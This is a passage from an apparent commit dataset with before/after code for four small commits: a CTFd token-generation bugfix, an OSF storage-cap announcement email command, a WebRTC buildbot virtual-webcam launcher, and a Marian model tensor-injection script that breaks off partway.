user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
<commit_msg>Fix tokens using too-random of a value<commit_after>
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
Fix tokens using too-random of a valueimport datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
<commit_before>import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=hexencode(os.urandom(32))
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
<commit_msg>Fix tokens using too-random of a value<commit_after>import datetime
import os
from flask import session
from CTFd.exceptions import UserNotFoundException, UserTokenExpiredException
from CTFd.models import UserTokens, db
from CTFd.utils.encoding import hexencode
from CTFd.utils.security.csrf import generate_nonce
def login_user(user):
session["id"] = user.id
session["name"] = user.name
session["email"] = user.email
session["nonce"] = generate_nonce()
def logout_user():
session.clear()
def generate_user_token(user, expiration=None):
temp_token = True
while temp_token is not None:
value = hexencode(os.urandom(32))
temp_token = UserTokens.query.filter_by(value=value).first()
token = UserTokens(
user_id=user.id, expiration=expiration, value=value
)
db.session.add(token)
db.session.commit()
return token
def lookup_user_token(token):
token = UserTokens.query.filter_by(value=token).first()
if token:
if datetime.datetime.utcnow() >= token.expiration:
raise UserTokenExpiredException
return token.user
else:
raise UserNotFoundException
return None
|
30e7e3c8812045ea83ab851181db2312029bacc5
|
osf/management/commands/send_storage_exceeded_announcement.py
|
osf/management/commands/send_storage_exceeded_announcement.py
|
import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
Add storage exceeded announcement script
|
Add storage exceeded announcement script
|
Python
|
apache-2.0
|
Johnetordoff/osf.io,adlius/osf.io,adlius/osf.io,brianjgeiger/osf.io,aaxelb/osf.io,brianjgeiger/osf.io,CenterForOpenScience/osf.io,baylee-d/osf.io,mfraezz/osf.io,brianjgeiger/osf.io,aaxelb/osf.io,mfraezz/osf.io,Johnetordoff/osf.io,felliott/osf.io,cslzchen/osf.io,baylee-d/osf.io,aaxelb/osf.io,adlius/osf.io,felliott/osf.io,cslzchen/osf.io,mfraezz/osf.io,cslzchen/osf.io,baylee-d/osf.io,CenterForOpenScience/osf.io,Johnetordoff/osf.io,felliott/osf.io,aaxelb/osf.io,mfraezz/osf.io,Johnetordoff/osf.io,brianjgeiger/osf.io,adlius/osf.io,CenterForOpenScience/osf.io,cslzchen/osf.io,CenterForOpenScience/osf.io,felliott/osf.io
|
Add storage exceeded announcement script
|
import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
<commit_before><commit_msg>Add storage exceeded announcement script<commit_after>
|
import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
Add storage exceeded announcement scriptimport logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
<commit_before><commit_msg>Add storage exceeded announcement script<commit_after>import logging
import json
from tqdm import tqdm
from website import mails
from django.core.management.base import BaseCommand
from osf.models import Node, OSFUser
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def obj_gen(targets):
for u_id, n_dict in targets.items():
try:
u = OSFUser.load(u_id)
priv = [n for n in [Node.load(n_id) for n_id in n_dict.get('private', [])] if not n.is_public]
pub = []
for n_id in n_dict.get('public', []):
# Add previously-public nodes to private list, as 50>5.
# Do not do the reverse.
n = Node.load(n_id)
if n.is_public:
pub.append(n)
else:
priv.append(n)
yield u, pub, priv
except Exception:
logger.error(f'Unknown exception handling {u_id}, skipping')
def main(json_file, dry=False):
if not json_file:
logger.info('No file detected, exiting.')
return
targets = json.load(json_file)
errors = []
p_bar = tqdm(total=len(targets))
i = 1
for user, public_nodes, private_nodes in obj_gen(targets):
if public_nodes or private_nodes:
if not dry:
try:
mails.send_mail(
to_addr=user.username,
mail=mails.STORAGE_CAP_EXCEEDED_ANNOUNCEMENT,
user=user,
public_nodes=public_nodes,
private_nodes=private_nodes,
can_change_preferences=False,
)
except Exception:
errors.append(user._id)
else:
logger.info(f'[Dry] Would mail {user._id}')
p_bar.update(i)
i += 1
p_bar.close()
logger.info(f'Complete. Errors mailing: {errors}')
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--dry',
dest='dry',
action='store_true',
help='Dry run'
)
parser.add_argument(
'--json',
dest='json_file',
type=open,
help='Path of the json input',
)
def handle(self, *args, **options):
json_file = options.get('json_file', None)
dry = options.get('dry', None)
main(json_file, dry)
|
|
73a4d5ab12efc6035a5c44625e1e772fd6c23ffc
|
webrtc/test/buildbot/ensure_webcam_is_running.py
|
webrtc/test/buildbot/ensure_webcam_is_running.py
|
#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
Add script to ensure virtual webcam is running.
|
Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d
|
Python
|
bsd-3-clause
|
mwgoldsmith/libilbc,ShiftMediaProject/libilbc,mwgoldsmith/ilbc,TimothyGu/libilbc,mwgoldsmith/libilbc,TimothyGu/libilbc,ShiftMediaProject/libilbc,mwgoldsmith/libilbc,ShiftMediaProject/libilbc,mwgoldsmith/ilbc,TimothyGu/libilbc,mwgoldsmith/libilbc,TimothyGu/libilbc,mwgoldsmith/ilbc,ShiftMediaProject/libilbc,mwgoldsmith/ilbc,ShiftMediaProject/libilbc,TimothyGu/libilbc
|
Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d
|
#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
<commit_before><commit_msg>Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d<commit_after>
|
#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
<commit_before><commit_msg>Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d<commit_after>#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
|
aed31cd5d5341712819772d27ec99e364f20e8d0
|
scripts/contrib/inject_ctt.py
|
scripts/contrib/inject_ctt.py
|
#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
Add script for injecting 'decoder_c_tt'
|
Add script for injecting 'decoder_c_tt'
|
Python
|
mit
|
marian-nmt/marian-train,emjotde/amunmt,marian-nmt/marian-train,marian-nmt/marian-train,emjotde/Marian,emjotde/amunn,marian-nmt/marian-train,amunmt/marian,emjotde/amunmt,emjotde/amunn,amunmt/marian,amunmt/marian,marian-nmt/marian-train,emjotde/amunmt,emjotde/Marian,emjotde/amunmt,emjotde/amunn,emjotde/amunn
|
Add script for injecting 'decoder_c_tt'
|
#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script for injecting 'decoder_c_tt'<commit_after>
|
#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
Add script for injecting 'decoder_c_tt'#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script for injecting 'decoder_c_tt'<commit_after>#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
